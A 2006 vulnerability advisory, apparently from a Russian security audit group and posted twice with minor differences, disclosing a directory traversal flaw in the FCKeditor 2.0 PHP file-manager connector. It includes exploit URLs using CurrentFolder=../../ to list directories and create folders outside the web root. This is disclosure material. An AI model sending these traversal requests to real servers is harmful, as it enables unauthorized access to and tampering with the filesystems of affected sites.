Research:
NSA Group [Russian company on Audit of safety & Network security]
Site of Research:
http://www.nsag.ru or http://www.nsag.org
Product:
FCKeditor 2.0 FC
Site of manufacturer:
http://www.fckeditor.net
The status:
19/11/2005 - Publication is postponed.
19/11/2005 - Manufacturer is notified.
21/02/2006 - Answer of the manufacturer is absent.
21/02/2006 - Publication of vulnerability.
Original Advisory:
http://www.nsag.ru/vuln/952.html
Risk:
Hide
Description:
The output for limits of a virtual directory is possible.
Influence:
Listing of directories, creation of folders outside a virtual directory.
http://SERVER/filemanager/browser/default/connectors/php/connector.php?C
ommand=CreateFolder&Type=File&CurrentFolder=../../&NewFolderName=TESTNAM
E
Decision:
To address on a site of the manufacturer http://www.fckeditor.net
Or contact us and receive consultations.
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Our company is the independent auditor of the software in market IT.
At present independent audit of the software becomes the standard practice
and we suggest to make a let out product as much as possible protected
from a various sort of attacks of malefactors!
NSAG-¹195-23.02.2006
Research:
NSA Group [Russian company on Audit of safety & Network security]
Site of Research:
http://www.nsag.ru or http://www.nsag.org
Product:
FCKeditor 2.0 FC
Site of manufacturer:
http://www.fckeditor.net
The status:
19/11/2005 - Publication is postponed.
19/11/2005 - Manufacturer is notified.
21/02/2006 - Answer of the manufacturer is absent.
21/02/2006 - Publication of vulnerability.
Original Advisory:
http://www.nsag.ru/vuln/952.html
Risk:
Hide
Description:
The output for limits of a virtual directory is possible.
Influence:
Listing of directories, creation of folders outside a virtual directory.
Exploit:
http://SERVER/filemanager/browser/default/connectors/php/connector.php?C
ommand=GetFoldersAndFiles&Type=File&CurrentFolder=../../
http://SERVER/filemanager/browser/default/connectors/php/connector.php?C
ommand=CreateFolder&Type=File&CurrentFolder=../../&NewFolderName=TESTNAM
E
Decision:
To address on a site of the manufacturer http://www.fckeditor.net
Or contact us and receive consultations.
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Our company is the independent auditor of the software in market IT.
At present independent audit of the software becomes the standard practice
and we suggest to make a let out product as much as possible protected
from a various sort of attacks of malefactors!
www.nsag.ru
«Nemesis» © 2006
------------------------------------
Nemesis Security Audit Group © 2006.
[ reply ]